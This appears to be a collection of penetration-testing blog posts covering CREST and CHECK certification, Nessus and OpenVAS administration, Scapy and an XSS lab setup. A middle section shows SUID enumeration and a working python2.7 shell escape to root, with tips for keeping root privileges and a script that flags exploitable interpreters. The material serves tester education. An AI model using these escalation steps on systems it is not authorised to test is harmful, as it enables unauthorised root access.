New CREST penetration testing certifications

CREST has recently announced several new penetration testing certifications:

  • CREST Registered Security Analyst (Penetration Testing) – CRSA
  • CREST Certified Security Consultant (Red Team) – CCSC RED
  • CREST Certified Security Consultant (Networks) – CCSC NET
  • CREST Certified Security Consultant (Web) – CCSC WEB

Further information can be found on the CREST website.

How to become CHECK “green lighted” to deliver ITHC (guidance for organisations and people)

A CHECK approved company, otherwise described as having been granted "green light" status, is one that NCSC has approved to deliver IT Health Check (ITHC) penetration testing or vulnerability assessment services to UK government departments and critical national infrastructure (CNI) organisations.

NCSC has the following to say when discussing what CHECK is and what it means for penetration testing services:

CHECK is the term for the NCSC approved penetration test companies and the methodology used to conduct a penetration test. Companies providing CHECK services do so using staff who hold NCSC approved qualifications and have suitable experience. Penetration tests are conducted using NCSC recognised methods and the subsequent report and recommendations are produced to a recognised standard.

Also quoted directly from the NCSC website, the following criteria must be met before the CHECK assessment:

  • the company must be able to sign-up to English law
  • the company must have performed penetration testing service under their company name for a minimum of 12 months
  • all proposed team members must be able to hold SC clearance
  • there is a minimum of one team member who has passed a CHECK Team Leader examination, and can provide a technical (only) CV, 2 redacted penetration test reports they have authored, and have at least 12 months penetration testing experience

Guidance for organisations seeking to be assessed by NCSC in order to obtain CHECK status can be found on the NCSC website.

How to join CREST as an organisational member

CREST is widely known in the penetration testing industry because of its professional membership scheme, its professional certifications for penetration testers, and its support for companies working towards CHECK status with NCSC.

An excerpt from CREST's website regarding membership:

In accordance with CREST’s stated aim “to increase professionalism in the security testing industry”, CREST places requirements on member companies in order to ensure that consistent standards of services are delivered.

It is worth noting that, as covered in the FAQ provided by CREST, obtaining organisational membership is not dependent on staff holding CREST certifications.

For full guidance on joining CREST as an organisational member, see the membership section of the CREST website.

Nessus has detected that API access on this scanner is disabled.

Nessus displays the warning “Nessus has detected that API access on this scanner is disabled” during use.

To fix this, stop the Nessus service, reset its configuration, start the service again and re-register the scanner with your previous activation code. The reset clears the scanner's registration along with the rest of its configuration, so step 4 is not optional, and the plugin set must be fetched again afterwards (step 5). The service commands below assume a SysV-style init; on systemd hosts use systemctl stop nessusd and systemctl start nessusd instead.

1. Stop the Nessus service:
service nessusd stop

2. Reset the configuration:
/opt/nessus/sbin/nessuscli fix --reset

3. Start the Nessus service:
service nessusd start

4. Register Nessus using your previous registration key:
/opt/nessus/sbin/nessuscli fetch --register xxxx-xxxx-xxxx-xxxx-xxxx

5. Login to Nessus to update plugins.

OpenVAS Administrator Password Reset

To reset the password of the OpenVAS administrator account (admin), the following command can be used:

openvasmd --user=admin --new-password=admin_password

Alternatively, the following commands create an additional user and then set its password. Note that --user together with --new-password only changes the password of an existing user; creating the account is a separate step, done with --create-user, which creates the user with the Admin role and prints a generated password:

openvasmd --create-user=new_user
openvasmd --user=new_user --new-password=user_password

A password passed on the command line is recorded in shell history and is visible to other local users via ps while the command runs, so remove the history entry afterwards or set passwords through the web interface instead. On GVM 10 and later the openvasmd binary has been renamed gvmd and accepts the same --user and --new-password options.

Searching for binaries for privilege escalation exploit

During the attack phase of a pen test, once a shell has been obtained, the next step is usually to escalate privileges to root. First confirm who the shell is running as with the id command (note that there is no euid field in the output below, so the shell is running with the unprivileged user's identity):

$ id
uid=1000(user) gid=1000(user) groups=1000(user),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),108(netdev),114(bluetooth)

Then we can use the following command to list the executables on the system that have the set-user-ID (SUID) bit set:

find / -perm -u=s -type f 2>/dev/null

Here, find searches from the root directory (/) for regular files (-type f) whose set-user-ID bit is set (-perm -u=s; the leading dash means "at least these bits", and -perm -4000 is equivalent). The SUID bit has no effect on directories under Linux, which is why only files are of interest. Error messages such as "Permission denied" for directories the current user cannot read go to standard error, so redirecting stderr to the null device (2>/dev/null) leaves only the matches on the terminal. The same search with -perm -g=s finds set-group-ID (SGID) files.

Example shown below:

$ find / -perm -u=s 2>/dev/null
/sbin/mount.nfs
/usr/sbin/exim4
/usr/lib/eject/dmcrypt-get-device
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/openssh/ssh-keysign
/usr/bin/gpasswd
/usr/bin/newgrp
/usr/bin/python2.7
/usr/bin/chsh
/usr/bin/at
/usr/bin/mawk
/usr/bin/chfn
/usr/bin/procmail
/usr/bin/passwd
/bin/su
/bin/umount
/bin/mount

Note that if stdout had been redirected instead (> /dev/null, equivalently 1> /dev/null), the matches would have been discarded and only the permission denied errors would remain on the terminal. In the example above, most entries (passwd, su, mount, ssh-keysign) are expected SUID binaries, but an interpreter such as /usr/bin/python2.7 running set-uid root is not: it will execute any code we give it with an effective UID of 0. We can use the following command to obtain a shell from it:

/usr/bin/python2.7 -c 'import pty;pty.spawn("/bin/sh")'

Because python2.7 is SUID root, the interpreter runs with euid 0 and the shell it spawns inherits that effective UID; pty.spawn also allocates a proper TTY, which is convenient after a reverse shell connection. One caveat: if /bin/sh is bash rather than dash, bash drops an effective UID that differs from the real UID on startup unless it is run in privileged mode (pty.spawn(["/bin/sh","-p"])), and calling os.setuid(0) before spawning the shell turns euid 0 into a full uid 0. The result can be seen from the following commands:

# id
uid=1000(user) gid=1000(user) euid=0(root) groups=1000(user),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),108(netdev),114(bluetooth)
# whoami
root

We can see that the user now has root privileges, denoted by euid=0(root) in the id output and by whoami, which reports the effective user.
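As an added example (not the original author's script), the same enumeration in Python 3, going beyond the single find command above in two ways: it also collects SGID files, and it flags any hit whose basename is a known shell-capable interpreter such as python2.7 or mawk from the listing above. The SHELL_CAPABLE set and the constructed demo tree built by build_demo_tree() are assumptions for illustration.

```python
#!/usr/bin/env python3
"""Enumerate set-user-ID / set-group-ID files and flag the ones that can
hand out a shell.  Added example for this post, not the original author's
code.  SHELL_CAPABLE is an assumed list: the two interpreters from the
find output above (python2.7, mawk) plus other well-known interpreter
escapes; extend it for your own environment."""
import os
import stat
import tempfile

SHELL_CAPABLE = {"python", "perl", "awk", "mawk", "gawk", "nawk",
                 "vim", "vi", "find", "bash", "sh", "dash", "ruby", "lua"}


def find_setid(root="/"):
    """Return sorted (path, mode) pairs for regular files under root with
    SUID or SGID set.  Equivalent to
        find ROOT \\( -perm -u=s -o -perm -g=s \\) -type f 2>/dev/null
    Unreadable directories are skipped (onerror) and entries that cannot
    be stat'ed are ignored, which is exactly what 2>/dev/null hides."""
    hits = []
    for dirpath, _dirs, files in os.walk(root, onerror=lambda _e: None,
                                         followlinks=False):
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)          # lstat: never follow symlinks
            except OSError:
                continue
            if stat.S_ISREG(st.st_mode) and \
                    st.st_mode & (stat.S_ISUID | stat.S_ISGID):
                hits.append((path, st.st_mode))
    return sorted(hits)


def classify(path, mode):
    """Return (bits, shell_capable).  bits is 'SUID', 'SGID' or 'SUID+SGID';
    shell_capable is True when the basename, with any trailing version
    suffix stripped (python2.7 -> python), is in SHELL_CAPABLE."""
    bits = [n for n, b in (("SUID", stat.S_ISUID), ("SGID", stat.S_ISGID))
            if mode & b]
    base = os.path.basename(path)
    stem = base.rstrip("0123456789.")
    return "+".join(bits), (base in SHELL_CAPABLE or stem in SHELL_CAPABLE)


def report(root="/"):
    """Human-readable lines, shell-capable hits first, marked with '!!'."""
    rows = [(classify(p, m), p) for p, m in find_setid(root)]
    rows.sort(key=lambda r: (not r[0][1], r[1]))
    return ["%-9s %-5s %s" % (bits, "!!" if hot else "", p)
            for (bits, hot), p in rows]


def build_demo_tree():
    """Constructed sample tree (assumption, for offline use): a SUID
    interpreter, a legitimate SUID passwd, an SGID mawk and a plain ls."""
    root = tempfile.mkdtemp(prefix="setid-demo-")
    bindir = os.path.join(root, "usr", "bin")
    os.makedirs(bindir)
    for name, mode in (("python2.7", 0o4755), ("passwd", 0o4755),
                       ("mawk", 0o2755), ("ls", 0o755)):
        p = os.path.join(bindir, name)
        with open(p, "w") as f:
            f.write("#!/bin/sh\n")
        os.chmod(p, mode)
    return root


if __name__ == "__main__":
    import sys
    target = sys.argv[1] if len(sys.argv) > 1 else "/"
    print("\n".join(report(target)))
```

Run it with no argument to walk the real filesystem (as the unprivileged user, just like the find command), or point it at the demo tree to see the ordering: the flagged interpreter comes first, the expected SUID binaries after it. Anything flagged deserves a second look, but so does any unfamiliar SUID binary; a custom or vendor-specific one is often the easier target.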

List of Tenable Nessus plugin families

AIX Local Security Checks
Amazon Linux Local Security Checks
Backdoors
Brute force attacks
CentOS Local Security Checks
CGI abuses
CGI abuses : XSS
CISCO
Databases
Debian Local Security Checks
Default Unix Accounts
Denial of Service
DNS
F5 Networks Local Security Checks
Fedora Local Security Checks
Firewalls
FreeBSD Local Security Checks
FTP
Gain a shell remotely
General
Gentoo Local Security Checks
HP-UX Local Security Checks
Huawei Local Security Checks
Incident Response
Junos Local Security Checks
MacOS X Local Security Checks
Mandriva Local Security Checks
Misc.
Netware
Oracle Linux Local Security Checks
OracleVM Local Security Checks
Palo Alto Local Security Checks
Peer-To-Peer File Sharing
PhotonOS Local Security Checks
Red Hat Local Security Checks
RPC
SCADA
Scientific Linux Local Security Checks
Service detection
Settings
Slackware Local Security Checks
SMTP problems
SNMP
Solaris Local Security Checks
SuSE Local Security Checks
Ubuntu Local Security Checks
Virtuozzo Local Security Checks
VMware ESX Local Security Checks
Web Servers
Windows
Windows : Microsoft Bulletins
Windows : User management

Using Scapy (Python packet manipulation program)

Scapy is a Python program that enables the user to send, sniff and dissect and forge network packets. This capability allows construction of tools that can probe, scan or attack networks.

In other words, Scapy is a powerful interactive packet manipulation program. It is able to forge or decode packets of a wide number of protocols, send them on the wire, capture them, match requests and replies, and much more. Scapy can easily handle most classical tasks like scanning, tracerouting, probing, unit tests, attacks or network discovery. It can replace hping, arpspoof, arp-sk, arping, p0f and even some parts of Nmap, tcpdump and tshark.

Online guidance for using Scapy can be found in the official Scapy documentation.

Setting up XAMPP for Personal XSS Labs

XAMPP (Cross-platform, Apache + MariaDB + PHP + Perl).

1. Download XAMPP from the Apache Friends website (apachefriends.org).

2. Follow the XAMPP setup wizard.

3. Leave default XAMPP components enabled (Server, Program Languages, etc.).

4. Select installation folder location.

5. Run XAMPP Control Panel.

6. Enable Apache and MySQL modules by selecting the Start action buttons.

7. Open a browser and navigate to localhost or 127.0.0.1 to display the XAMPP dashboard. This verifies that XAMPP is running successfully.

XAMPP is a development stack and its defaults are not hardened: the MySQL root account has an empty password and Apache listens on all interfaces. That is fine for a personal XSS lab, but keep the machine on a host-only or otherwise isolated network rather than exposing it to a shared LAN.